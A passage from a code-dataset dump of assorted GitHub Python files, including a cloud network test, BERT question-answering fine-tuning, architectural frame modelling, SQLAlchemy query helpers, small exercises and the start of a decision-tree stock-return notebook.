vnic_uuid=vr_l3_vm.get_vm().vmNics[0].uuid, vm_obj=vr_l3_vm)\n\n flat_vip.attach_eip(test.flat_eip)\n 
vr_vip.attach_eip(test.vr_eip)\n\n for vm in (flat_l3_vm, vr_l3_vm):\n vm.check()\n\n for ip in [pub_l3_vm.get_vm().vmNics[0].ip, flat_vip.get_vip().ip, vr_vip.get_vip().ip]:\n if not test_lib.lib_check_directly_ping(ip):\n test_util.test_fail('expected to be able to ping vip while it fail')\n\n test_util.test_pass('pub vm volume network test pass')\n\n\ndef env_recover():\n test.flat_eip.delete()\n test.vr_eip.delete()\n test_lib.lib_error_cleanup(test_obj_dict)\n","repo_name":"bgerxx/woodpecker","sub_path":"integrationtest/vm/virtualrouter/pub_l3_vm/test_pub_vm_network.py","file_name":"test_pub_vm_network.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40503031417","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom transformers import AdamW\nfrom tqdm import tqdm\nfrom transformers import BertForQuestionAnswering\nimport numpy as np\n\n\ndef train_lm_squad(\n train_dataset,\n tokenizer,\n epochs=20,\n pretrained_model_name=\"shahrukhx01/chemical-bert-uncased\",\n save_model_name=\"chemical-bert-uncased-squad\",\n):\n def train_collate(batch):\n len_batch = len(batch)\n batch = list(filter(lambda x: x is not None, batch))\n\n if len_batch > len(batch):\n db_len = len(train_dataset)\n diff = len_batch - len(batch)\n while diff != 0:\n a = train_dataset[np.random.randint(0, db_len)]\n if a is None:\n continue\n batch.append(a)\n diff -= 1\n\n return torch.utils.data.dataloader.default_collate(batch)\n\n model = BertForQuestionAnswering.from_pretrained(pretrained_model_name)\n\n # setup GPU/CPU\n device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n # move model over to detected device\n model.to(device)\n # activate training mode of model\n model.train()\n # initialize adam optimizer with weight decay (reduces chance of overfitting)\n optim = AdamW(model.parameters(), lr=5e-5)\n\n # initialize data loader for training data\n train_loader = DataLoader(\n train_dataset, batch_size=16, shuffle=True, collate_fn=train_collate\n )\n\n for epoch in range(epochs):\n # set model to train mode\n model.train()\n # setup loop (we use tqdm for the progress bar)\n loop = tqdm(train_loader, leave=True)\n for batch in loop:\n try:\n # initialize calculated gradients (from prev step)\n optim.zero_grad()\n # pull all the tensor batches required for training\n input_ids = batch[\"input_ids\"].to(device)\n attention_mask = batch[\"attention_mask\"].to(device)\n start_positions = batch[\"start_positions\"].to(device)\n end_positions = batch[\"end_positions\"].to(device)\n # train model on batch and return outputs (incl. 
loss)\n outputs = model(\n input_ids,\n attention_mask=attention_mask,\n start_positions=start_positions,\n end_positions=end_positions,\n )\n # extract loss\n loss = outputs[0]\n # calculate loss for every parameter that needs grad update\n loss.backward()\n # update parameters\n optim.step()\n # print relevant info to progress bar\n loop.set_description(f\"Epoch {epoch}\")\n loop.set_postfix(loss=loss.item())\n except:\n continue\n\n model.save_pretrained(f\"{save_model_name}_{epoch}\")\n tokenizer.save_pretrained(f\"{save_model_name}_{epoch}\")\n\n return model, device\n","repo_name":"shahrukhx01/finetune-domain-lm-squad","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26006613529","text":"from pyplasm import *\nimport csv\nfrom ast import literal_eval as make_tuple\n\n \ndef intersperse(seq, value):\n \"\"\"\n intersperse is a function that, given a list and a value, intersperse the list with the value.\n If the resultant list has an odd number of elements,\n a value is appended to the end of it.\n \n @param seq: the list to intersperse\n @param value: the value to insert into the new list\n @return res: a new list interspersed\n \"\"\"\n res = [value] * (2 * len(seq) - 1)\n res[::2] = seq\n if (len(res)%2 != 0):\n res.append(value)\n return res\n \ndef drawStructure(beamDimensions, pillarDimensions, pillarDistances, interstoryHeights):\n \"\"\"\n drawStructure is a function that, given beam's dimensions, pillars's dimensions, distances between the pillars (y-axis),\n interstory's heights (z-axis), return an HPC model of a space frame of reinforced concrete.\n \n @param beamDimensions: tuple, representing the dimensions of a beam (x,z)\n @param pillarDimensions: tuple, representing the dimensions of a pillar (x,y)\n @param pillarDistances: list representing the distances between pillars [dy1, dy2, ...]\n @param interstoryHeights: list representing the heights of every interstory [dz1, dz2, dz3, ...]\n @return model: HPC model of the space frame\n \"\"\"\n \t\n #generating values for the pillars Y-axis\n pillarDistances = [0] + pillarDistances\n linearPillars = intersperse(pillarDistances, pillarDimensions[1])\n \n #generating pillars HPC model\n pillars3D = INSR(PROD)([QUOTE([pillarDimensions[0], -3]),QUOTE(linearPillars), QUOTE(intersperse([-interstory for interstory in interstoryHeights], -beamDimensions[1]))])\n \n #generating values for horizontal beams perpendicular to the Y-axis\n horizontalBeamXYAxis = [pillarDimensions[0],-3]\n horizontalBeamYYAxis = intersperse([-beam for beam in pillarDistances], pillarDimensions[1])\n horizontalBeamYYAxis[0] = -horizontalBeamYYAxis[0]\n \n #generating HPC model of the beams perpendicular to the Y-axis\n beamsY3D = INSR(PROD)([QUOTE(horizontalBeamXYAxis), QUOTE(horizontalBeamYYAxis), QUOTE(intersperse(interstoryHeights,beamDimensions[1]))])\n \n #assembling the HPC model\n model = STRUCT([pillars3D, beamsY3D])\n return model\n\ndef generate_beams(file_name):\n\t\"\"\"\n\tgenerateBeams is a function that, given a csv file name generate the 3D HPC model of the beams. 
Actually the function uses \";\"\n\tas default delimiter instead of the classic \",\", that's useful in order to correctly parse lists and their elements.\n\t@param file_name: the csv file name \n\t@return: the 3D HPC model of the beams\n\t\"\"\"\n\t#generating 1D beams list X-axis \n\twith open(file_name, 'rb') as file:\n\t\treader = csv.reader(file, delimiter=';')\n\t\tbeamlengthX = []\n\t\tbeamlengthZ = []\n\t\tdata = []\n\t\taccumulator = 0\n\t\tfor row in reader:\n\t\t\taccumulator = accumulator + 1\n\t\t\tdata.append(row)\n\t\t\tif(accumulator == 2):\n\t\t\t\tif(float(data[0][0]) == 0):\n\t\t\t\t\tbeamlengthX.append(-(make_tuple(data[1][1])[0]))\n\t\t\t\telse:\n\t\t\t\t\tbeamlengthX.append(float(data[0][0])-make_tuple(data[1][1])[0])\n\t\t\t\t\tbeamlengthX.append(-(make_tuple(data[1][1])[0]))\n\t\t\t\taccumulator = 0\n\t\t\t\tdata = []\n\t#generating 1D beams list Y-axis \n\twith open(file_name, 'rb') as file:\n\t\treader = csv.reader(file, delimiter=';')\n\t\tdata = []\n\t\tbeamlengthY = []\n\t\taccumulator = 0\n\t\tfor row in reader:\n\t\t\tbeamlengthY = []\n\t\t\taccumulator = accumulator + 1\n\t\t\tdata.append(row)\n\t\t\tif(accumulator == 2):\n\t\t\t\tbeamlengthY.append(make_tuple(data[1][1])[1])\n\t\t\t\tfor element in make_tuple(data[1][2]):\n\t\t\t\t\tbeamlengthY.append(element)\n\t\t\t\t\tbeamlengthY.append(make_tuple(data[1][1])[1])\n\t\t\t\taccumulator = 0\n\t\t\t\tdata = []\n\t#generating 1D beams list Z-axis \n\twith open(file_name, 'rb') as file:\n\t\treader = csv.reader(file, delimiter=';')\n\t\tbeamlengthZ = []\n\t\taccumulator = 0\n\t\tfor row in reader:\n\t\t\taccumulator += 1\n\t\t\tif(accumulator == 2):\n\t\t\t\tbeamlengthZ = intersperse(make_tuple(row[3]), make_tuple(row[0])[1])\n\t\t\t\tbreak\n\t#returning the 3D HPC model of the beams\n\treturn INSR(PROD)([QUOTE(beamlengthX), QUOTE(beamlengthY), QUOTE(beamlengthZ)])\n\n \ndef ggpl_bone_structure(file_name):\n\t\"\"\"\n\tggpl_bone_structure is a function that, given a file name create an entire 3D parametric (spatial) \n\tbuilding frame in reinforced concrete. 
The parametrization is given by the csv file named \"file_name\".\n\t@param file_name: the file name of the csv file containing the dataset\n\t@return : the 3D HPC model of the parametric (spatial) building frame in reinforced concrete\n\t\"\"\"\n\n\twith open(file_name, 'rb') as file:\n\t\treader = csv.reader(file, delimiter=';')\n\n\t\t#used to store partial csv lines, usually 2\n\t\tdata = []\n\n\t\t#list of 3D models\n\t\tframeList = []\n\n\t\t#distances used to calculate the starting point of every frame\n\t\txdist = 0\n\t\tydist = 0 \n\t\tzdist = 0\n\n\t\t#value used to control the iteration through the csv dataset\n\t\taccumulator = 0\n\n\t\tfor row in reader:\n\t\t\taccumulator = accumulator + 1\n\t\t\tdata.append(row)\n\n\t\t\t#if we had read 2 lines\n\t\t\tif(accumulator == 2):\n\n\t\t\t\t#variable rename and casting\n\t\t\t\txPillar = float(data[0][0])\n\t\t\t\tyPillar = float(data[0][1])\n\t\t\t\tzPillar = float(data[0][2])\n\t\t\t\tbeamDimensions = make_tuple(data[1][0])\n\t\t\t\tpillarDimensions = make_tuple(data[1][1])\n\t\t\t\tpillarDistances = make_tuple(data[1][2])\n\t\t\t\tinterstoryHeights = make_tuple(data[1][3])\n\n\t\t\t\txdist = xdist + xPillar\n\t\t\t\tydist = ydist + yPillar\n\t\t\t\tzdist = zdist + zPillar\n\n\t\t\t\t#generating the frame\n\t\t\t\tmodel = drawStructure(beamDimensions, pillarDimensions, pillarDistances, interstoryHeights)\n\n\t\t\t\t#translating the frame according to the dataset\n\t\t\t\tframeElement = STRUCT([T(1)(xdist), T(2)(ydist), T(3)(zdist), model])\n\n\t\t\t\t#saving the new frame\n\t\t\t\tframeList.append(STRUCT([frameElement]))\n\n\t\t\t\t#restart iteration \n\t\t\t\taccumulator = 0\n\t\t\t\tdata = []\n\n\t\tframeList.append(generate_beams(file_name))\n\t\treturn STRUCT(frameList)\n\n \nVIEW(ggpl_bone_structure(\"frame_data_461400.csv\"))","repo_name":"gabmarini/ggpl","sub_path":"2016-10-21/workshop_02.py","file_name":"workshop_02.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10257822730","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Srikanth Mujjiga\"\n__copyright__ = \"Srikanth Mujjiga\"\n__license__ = \"mit\"\n\nimport sys\nfrom setuptools import setup\n\nentry_points = \"\"\"\n\"\"\"\n\ndef setup_package():\n needs_sphinx = {'build_sphinx', 'upload_docs'}.intersection(sys.argv)\n sphinx = ['sphinx'] if needs_sphinx else []\n setup(setup_requires=['pyscaffold>=3.0a0,<3.1a0'] + sphinx,\n entry_points=entry_points,\n use_pyscaffold=True)\n\nif __name__ == \"__main__\":\n setup_package()\n","repo_name":"smujjiga/pymm","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"34941491573","text":"\nclass Node:\n def __init__(self, val):\n self.value = val\n self.leftChild = None\n self.rightChild = None\n self.dis = 9999\n\nclass Solution:\n def minHeight(self, root):\n visit = []\n root.dis = 1\n while root.leftChild or root.rightChild:\n if root.leftChild:\n root.leftChild.dis = root.dis + 1\n visit.append(root.leftChild)\n if root.rightChild:\n root.rightChild.dis = root.dis + 1\n visit.append(root.rightChild)\n root = visit.pop(0)\n return root.dis\n\n# build the BST\nnode1 = Node(10)\nnode2 = Node(5)\nnode3 = Node(11)\nnode4 = Node(14)\nnode1.leftChild = node2\nnode1.rightChild = node3\nnode3.rightChild = node4\n\ns = Solution()\nprint(s.minHeight(node1)) # 
2\n\nnode5 = Node(2)\nnode6 = Node(7)\nnode2.leftChild = node5\nprint(s.minHeight(node1)) # 3\nnode2.rightChild = node6\nprint(s.minHeight(node1)) # 3","repo_name":"jianfeiZhao/Data-Structure-and-Algorithms","sub_path":"LeetCode/minHeightOfBST.py","file_name":"minHeightOfBST.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21366535695","text":"from time import time\nimport networkx as nx\nfrom closures import save_and_draw_graph\nimport os\nimport glob\nimport re\n\n\nclass Counter:\n def __init__(self, id=1000):\n self.c = id\n\n def get(self):\n return self.c\n\n def inc(self):\n self.c += 1\n return self.c\n\n\nclass Context:\n def __init__(self, cnt=Counter(), op_cnt=0, start_time=int(time()), per_step_show=True, colors_dict=dict()):\n self.cnt = cnt\n self.time = start_time\n self.op_cnt = op_cnt # operation counter (current count of graph transformation)\n self.per_step_show = per_step_show\n self.colors_dict = colors_dict\n\n def inc(self):\n self.cnt += 1\n\n def op_inc(self):\n self.op_cnt += 1\n\n def renew_time(self):\n self.time = int(time())\n\n def disable_per_step_show(self):\n self.per_step_show = False\n\n def enable_per_step_show(self):\n self.per_step_show = True\n\n def compose_name(self, suffix=\"\"):\n return \"pic_\" + str(self.time) + \"_\" + str(self.op_cnt) + suffix + \".png\"\n\n\ndef print_fig(G, ctx, suffix):\n if ctx.per_step_show:\n save_and_draw_graph(G, num_palette=ctx.colors_dict, pic_name=ctx.compose_name(suffix), show_graph=False)\n ctx.op_inc()\n\n\ntypes = {'p': 'pid_ns',\n 'g': 's',\n 's': 'pid_ns',\n 'pid_ns': 'pid_ns'}\n\n\nclasses = {'p': 'FF',\n 'g': 'SI',\n 's': 'HI',\n 'pid_ns': 'HI'}\n\n\ndef get_free_cnt(cnt):\n return cnt.inc()\n\n\ndef get_parent(G, item):\n for (u,x,k) in G.out_edges(item, keys=True):\n if k == 'pred':\n return x\n\n for (u, x, k) in G.out_edges(G.nodes[item]['ppid'], keys=True):\n if k == 'h' and G.nodes[x]['ppid'] == G.nodes[u]['pid']:\n return u\n\n return G.nodes[item]['ppid']\n\n\ndef has_in_syscall(G,v):\n for (x,y,z) in list(G.in_edges(v,keys=True)):\n if (z.endswith(')')):\n return y\n\n return None\n\n\nclass Netconfig:\n def __init__(self,host='192.168.1.103', port='22', user='osboxes', password='osboxes.org',prog_prefix=''):\n self.host = host\n self.port = port\n self.user = user\n self.password = password\n self.prog_prefix = prog_prefix\n\n\nclass tcolor:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n\ndef rearrange_labels(text,new_numbers):\n result = re.split(r'[();,\\s]\\s*', text)# \"setpgid,x,y,\"\n result.remove('')\n try:\n label = result[0]+\"(\" +str(new_numbers[int(result[1])])+\",\"+str(new_numbers[int(result[2])])+\")\"\n except KeyError as e:\n label = result[0] + \"(\" + \"0\" + \",\" + \"0\" + \")\"\n return label\n\n\ndef rearrange_indexes(G, shift=1, full_tree=True):\n old_index = list()\n new_index = dict()\n top_order_list = list(prior_topological_sort(G)) # bfs_edges\n idx = 0\n for v in top_order_list:\n for u,v,k in G.in_edges(v, keys=True):\n if k == 'fork()': # v born from u\n idx += 1\n old_index.append(G.nodes[v]['pid'])\n new_index[G.nodes[v]['pid']] = idx + shift\n break\n\n if full_tree:\n new_index[1] = 1\n\n for v in top_order_list:\n for u, v, k in G.in_edges(v, keys=True):\n if k == \"follow\": # 
filter edges\n continue\n for key in ['pid', 'ppid', 'sid', 'pgid']:\n try:\n G.nodes[v][key] = new_index[G.nodes[v][key]]\n except KeyError:\n pass\n print(\"\\t\\t\\tlog\", key, G.nodes[v])\n if k.startswith(\"setpgid\"):\n #from networkx.classes.coreviews import AtlasView, AdjacencyView\n #ed=G[u][v][k]\n #@relatively_slow!\n G.remove_edge(u, v, k)\n G.add_edge(u, v, rearrange_labels(k,new_index))\n break\n #print(v, \": res on \" , G.nodes[v])\n\n return G\n\n\n# Get a list of all the file paths that ends with .txt from in specified directory\ndef rm_by_mask(prefix=\"\"):\n fileList = glob.glob(prefix)\n # Iterate over the list of filepaths & remove each file.\n for filePath in fileList:\n try:\n os.remove(filePath)\n except:\n print(\"Error while deleting file : \", filePath)\n\n\ndef prior_topological_sort(G):\n \"\"\"\n References\n ----------\n .. [1] Manber, U. (1989).\n *Introduction to Algorithms - A Creative Approach.* Addison-Wesley.\n [2] networkx dag algorithms implementation\n \"\"\"\n if not G.is_directed():\n raise nx.NetworkXError(\n \"Topological sort not defined on undirected graphs.\")\n\n indegree_map = {v: d for v, d in G.in_degree() if d > 0}\n # These nodes have zero indegree and ready to be returned.\n zero_indegree = [v for v, d in G.in_degree() if d == 0]\n\n def nofork(element):\n if element[2].startswith('fork'):\n return 1\n return 0\n\n while zero_indegree:\n node = zero_indegree.pop()\n if node not in G: # мы достали одну вершину\n raise RuntimeError(\"Graph changed during iteration\")\n edg = list(G.edges(node, keys=True)) # достанем её потомков, сортанём рёбра в верной последовательности действий\n edg = sorted(edg, key=nofork)\n for _, child, _ in edg:\n try:\n indegree_map[child] -= 1\n except KeyError:\n raise RuntimeError(\"Graph changed during iteration\")\n if indegree_map[child] == 0:\n zero_indegree.append(child)\n del indegree_map[child]\n\n yield node\n\n if indegree_map:\n raise nx.NetworkXUnfeasible(\"Graph contains a cycle or graph changed \"\n \"during iteration\")\n\n\ndef get_inferring_syscalls(G, top_sorted_nodes):\n top_sorted_edges = list()\n for node in top_sorted_nodes:\n for (u, v, k) in G.in_edges(node, keys=True):\n if k == 'follow':\n continue\n top_sorted_edges.append((u, v, k))\n return top_sorted_edges\n","repo_name":"nefanov/reconstructor","sub_path":"backstuff.py","file_name":"backstuff.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"34287950599","text":"import datetime\nfrom typing import Any, Dict, Union\n\nfrom sqlalchemy import and_, not_\nfrom sqlalchemy.exc import NoResultFound\nfrom sqlalchemy.orm import Query, Session\n\nfrom .db_table import CommentsDB, UserDB\n\n\nclass QueryHelper:\n \"\"\"Service class to handle basic operations with database query\"\"\"\n def __init__(self, filters: Dict):\n \"\"\"\n :param filters: Filters to find materialized path patterns\n :type filters: Dict\n \"\"\"\n self._path_filters = filters\n self.keys = ['comment_id', 'user', 'comment', 'date']\n\n @staticmethod\n def _filter_by_time(\n query: Query,\n start: Union[bool, float] = None,\n end: Union[bool, float] = None\n ) -> Query:\n \"\"\"\n Filter data by time interval\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :param start: Optional, if specified: start of time interval\n :type start: Union[bool, float]\n :param end: Optional, if specified: end of time interval\n :type end: Union[bool, float]\n 
:return: Modified query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n\n start = start if start else 0\n end = end if end else datetime.datetime.now().timestamp()\n query = query.filter(and_(CommentsDB.date > start,\n CommentsDB.date < end))\n return query\n\n @staticmethod\n def _parse_parameter(key: str, **kwargs: Any) -> Union[Any, None]:\n \"\"\"\n Parse value from keyword arguments\n :param key: Key which value to parse from kwargs\n :type key: str\n :param kwargs: Keyword arguments\n :type kwargs: Any\n :return: Parsed value if it is exists, else None\n :rtype: Union[Any, None]\n \"\"\"\n return kwargs[key] if key in kwargs else None\n\n @staticmethod\n def get_base_query(session: Session) -> Query:\n \"\"\"\n Create basic query to database\n :param session: Manages persistence operations for ORM-mapped objects\n :type session: sqlalchemy.orm.Session\n :return: Query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n query = session.query(\n CommentsDB.path,\n CommentsDB.id,\n UserDB.user,\n CommentsDB.comment,\n CommentsDB.date\n ).join(UserDB)\n return query\n\n @staticmethod\n def check_query(query: Query) -> Union[Query, None]:\n \"\"\"\n Check if query return nothing\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :return: Query if result is not empty, else None\n :rtype: Union[sqlalchemy.orm.Query, None]\n \"\"\"\n try:\n result = query.one()\n except NoResultFound:\n return\n return result\n\n @staticmethod\n def child_path(query: Query, path: str) -> Query:\n \"\"\"\n Get nested comments from specified parent path\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :param path: Parent path in comments table\n :type path: str\n :return: Query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n path_filter = path + '.'\n query = query.filter(CommentsDB.path.startswith(path_filter))\n return query\n\n def one_level_child_path(self, query: Query, path: str) -> Query:\n \"\"\"\n Get only one level depth comments form specified parent path\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :param path: Parent path in comments table\n :type path: str\n :return: Query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n path_filter = path + self._path_filters['inherits_one_level']\n query = self.child_path(query, path)\n query = query.filter(not_(CommentsDB.path.regexp_match(path_filter)))\n return query\n\n def first_level_path(self, query: Query) -> Query:\n \"\"\"\n Get only first level comment from comments table\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :return: Query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n path_filter = self._path_filters['first_level']\n query = query.filter(not_(CommentsDB.path.regexp_match(path_filter)))\n\n return query\n\n def modify_data(self, query: Query, **kwargs: Any) -> Query:\n \"\"\"\n Apply selected filters for query\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :param kwargs: Keyword arguments containing filter parameters:\n :start: (float) Start of time interval for filtering data\n :end: (float) End of time interval for filtering data\n :last: (bool) Get only last actual comments\n :do_sort: (bool) Sort data by time\n :type kwargs: Any\n :return: Modified query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n last = self._parse_parameter('last', **kwargs)\n do_sort = self._parse_parameter('do_sort', **kwargs)\n start = self._parse_parameter('start', **kwargs)\n end = self._parse_parameter('end', **kwargs)\n\n if last:\n query = query.filter_by(last=True)\n if start 
or end:\n query = self._filter_by_time(query, start=start, end=end)\n if do_sort:\n query = query.order_by(CommentsDB.date)\n\n return query\n","repo_name":"violonistahiles/epam_final_task","sub_path":"db_backend/query_helper.py","file_name":"query_helper.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26410826287","text":"from datetime import datetime, timedelta\r\n \r\ndef ruutuaika():\r\n if True:\r\n tuloste_tiedosto = input(\"Tiedosto: \")\r\n aloitus_paiva = input(\"Aloituspäivä: \") \r\n kpl_paivia = int(input(\"Montako päivää: \"))\r\n else: \r\n tuloste_tiedosto = \"kesakuun_loppu.txt\"\r\n aloitus_paiva =\"24.6.2020\"\r\n kpl_paivia = 2\r\n \r\n aika = datetime.strptime(aloitus_paiva, \"%d.%m.%Y\") \r\n \r\n print(\"Anna ruutuajat kunakin päivänä minuutteina (TV tietokone mobiililaite):\")\r\n i = 0\r\n lista_ajoista = []\r\n while i < kpl_paivia:\r\n paiva = (aika + timedelta(days=i)).strftime(\"%d.%m.%Y\")\r\n ruutuaika = input(f'Ruutuaika {paiva}: ')\r\n lista_ajoista.append((paiva, ruutuaika))\r\n i += 1\r\n \r\n eka_paiviva = aika.strftime(\"%d.%m.%Y\")\r\n viimeinen_paiva = paiva = (aika + timedelta(days=kpl_paivia - 1)).strftime(\"%d.%m.%Y\")\r\n aika_yhteensa = 0\r\n for a in lista_ajoista:\r\n for b in a[1].split(\" \"):\r\n aika_yhteensa += int(b)\r\n \r\n aika_keskimaarin = aika_yhteensa / kpl_paivia\r\n \r\n open(tuloste_tiedosto, \"w\").close()\r\n with open(tuloste_tiedosto, \"a\") as output:\r\n output.write(f'Ajanjakso: {eka_paiviva}-{viimeinen_paiva}\\n')\r\n output.write(f'Yhteensä minuutteja: {aika_yhteensa}\\n')\r\n output.write(f'Keskimäärin minuutteja päivässä: {aika_keskimaarin}\\n')\r\n \r\n for i in lista_ajoista:\r\n j = i[1].split(\" \")\r\n output.write(f'{i[0]}: {j[0]}/{j[1]}/{j[2]}\\n')\r\n \r\n print(f'Tiedot tallennettu tiedostoon {tuloste_tiedosto}')\r\n \r\n#main\r\nif __name__ == \"__main__\":\r\n ruutuaika()","repo_name":"TomiSar/ProgrammingMOOC2020","sub_path":"osa07-11_ruutuaika/src/ruutuaika.py","file_name":"ruutuaika.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70924935368","text":"from collections import Counter\n\ndef verify_permutation(string1, string2):\n count_string1, count_string2 = Counter(string1), Counter(string2)\n\n if len(count_string1) != len(count_string2):\n return False\n for element in count_string1:\n if element in count_string2:\n if count_string2[element] == count_string1[element]:\n continue\n else:\n return False\n else:\n return False\n return True\n# T.C - create 2 dicts, run for loop over length - O(n)\n\ndef main():\n result = verify_permutation(\"aba\",\"aab\")\n print(result)\nmain()","repo_name":"asinha01/CTC","sub_path":"1.2Checkstringpermutation.py","file_name":"1.2Checkstringpermutation.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7010465591","text":"# How to use decision trees to predict equity returns and price moves\n# In this notebook, we illustrate how to use tree-based models to gain insight and make predictions.\n# To demonstrate regression trees we predict returns, and for the classification case, we return to the example of\n# positive and negative asset price moves.\n\nimport os, sys\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api 
as sm\nimport graphviz\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom matplotlib.ticker import FuncFormatter\nfrom matplotlib import cm\n\nfrom scipy.stats import spearmanr\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor, export_graphviz, _tree\nfrom sklearn.linear_model import LinearRegression, LogisticRegression\nfrom sklearn.model_selection import train_test_split, GridSearchCV, learning_curve\nfrom sklearn.metrics import roc_auc_score, roc_curve, mean_squared_error, make_scorer\nfrom sklearn.tree._tree import Tree\n\n\nclass MultipleTimeSeriesCV:\n \"\"\"Generates tuples of train_idx, test_idx pairs\n Assumes the MultiIndex contains levels 'symbol' and 'date'\n purges overlapping outcomes\"\"\"\n\n def __init__(\n self,\n n_splits=3,\n train_period_length=126,\n test_period_length=21,\n lookahead=None,\n date_idx=\"date\",\n shuffle=False,\n ):\n self.n_splits = n_splits\n self.lookahead = lookahead\n self.test_length = test_period_length\n self.train_length = train_period_length\n self.shuffle = shuffle\n self.date_idx = date_idx\n\n def split(self, X, y=None, groups=None):\n unique_dates = X.index.get_level_values(self.date_idx).unique()\n days = sorted(unique_dates, reverse=True)\n split_idx = []\n for i in range(self.n_splits):\n test_end_idx = i * self.test_length\n test_start_idx = test_end_idx + self.test_length\n train_end_idx = test_start_idx + self.lookahead - 1\n train_start_idx = train_end_idx + self.train_length + self.lookahead - 1\n split_idx.append([train_start_idx, train_end_idx, test_start_idx, test_end_idx])\n\n dates = X.reset_index()[[self.date_idx]]\n for train_start, train_end, test_start, test_end in split_idx:\n\n train_idx = dates[\n (dates[self.date_idx] > days[train_start])\n & (dates[self.date_idx] <= days[train_end])\n ].index\n test_idx = dates[\n (dates[self.date_idx] > days[test_start]) & (dates[self.date_idx] <= days[test_end])\n ].index\n if self.shuffle:\n np.random.shuffle(list(train_idx))\n yield train_idx.to_numpy(), test_idx.to_numpy()\n\n def get_n_splits(self, X, y, groups=None):\n return self.n_splits\n\n\nsns.set_style(\"whitegrid\")\nplt.rcParams[\"figure.dpi\"] = 300\nplt.rcParams[\"font.size\"] = 16\npd.options.display.float_format = \"{:,.2f}\".format\nsys.path.insert(1, os.path.join(sys.path[0], \"..\"))\n\nresults_path = Path(\"../data/ch11\", \"decision_trees\")\nif not results_path.exists():\n results_path.mkdir(parents=True)\n\nif __name__ == \"__main__\":\n ## Load Model Data\n # We use a simplified version of the data set constructed in Chapter 4, Alpha factor research. It consists of daily\n # stock prices provided by Quandl for the 2010-2017 period and various engineered features. 
The details can be found\n # in the notebook [data_prep](00_data_prep.ipynb) in the GitHub repo for this chapter.\n # The decision tree models in this chapter are not equipped to handle missing or categorical variables, so we will\n # apply dummy encoding to the latter after dropping any of the former.\n with pd.HDFStore(\"../data/11_data.h5\") as store:\n data = store[\"us/equities/monthly\"]\n data.info()\n\n ## Simple Regression Tree with Time Series Data\n # Regression trees make predictions based on the mean outcome value for the training samples assigned to a given\n # node and typically rely on the mean-squared error to select optimal rules during recursive binary splitting.\n # Given a training set, the algorithm iterates over the predictors, $X_1, X_2, ..., X_p$, and possible cutpoints,\n # $s_1, s_2, ..., s_N$, to find an optimal combination. The optimal rule splits the feature space into two regions,\n # $\\{X\\mid X_i < s_j\\}$ and $\\{X\\mid X_i > s_j\\}$, with values for the $X_i$ feature either below or above the\n # $s_j$ threshold so that predictions based on the training subsets maximize the reduction of the squared residuals\n # relative to the current node.\n\n ### Generate two lags of monthly returns\n X2 = data.loc[:, [\"target\", \"return_1m\"]]\n X2.columns = [\"y\", \"t-1\"]\n X2[\"t-2\"] = data.groupby(level=\"ticker\").return_1m.shift()\n X2 = X2.dropna()\n X2.info()\n\n y2 = X2.y\n X2 = X2.drop(\"y\", axis=1)\n\n ### Explore Data\n # Note the small spike where we clipped the data.\n sns.histplot(data=y2)\n plt.tight_layout()\n plt.savefig(\"images/01-01.png\")\n\n ### Configure Tree\n # Let's start with a simplified example to facilitate visualization and only use two months of lagged returns to\n # predict the following month, in the vein of an AR(2) model from the last chapter:\n reg_tree_t2 = DecisionTreeRegressor(\n criterion=\"squared_error\",\n splitter=\"best\",\n max_depth=6,\n min_samples_split=2,\n min_samples_leaf=50,\n min_weight_fraction_leaf=0.0,\n max_features=None,\n random_state=42,\n max_leaf_nodes=None,\n min_impurity_decrease=0.0,\n )\n\n ### Train Decision Tree\n reg_tree_t2.fit(X=X2, y=y2)\n\n ### Visualize Tree\n # You can visualize the tree using the graphviz library (see GitHub for installation instructions) because sklearn\n # can output a description of the tree using the .dot language used by that library. You can configure the output\n # to include feature and class labels and limit the number of levels to keep the chart readable, as follows:\n out_file = results_path / \"reg_tree_t2.dot\"\n dot_data = 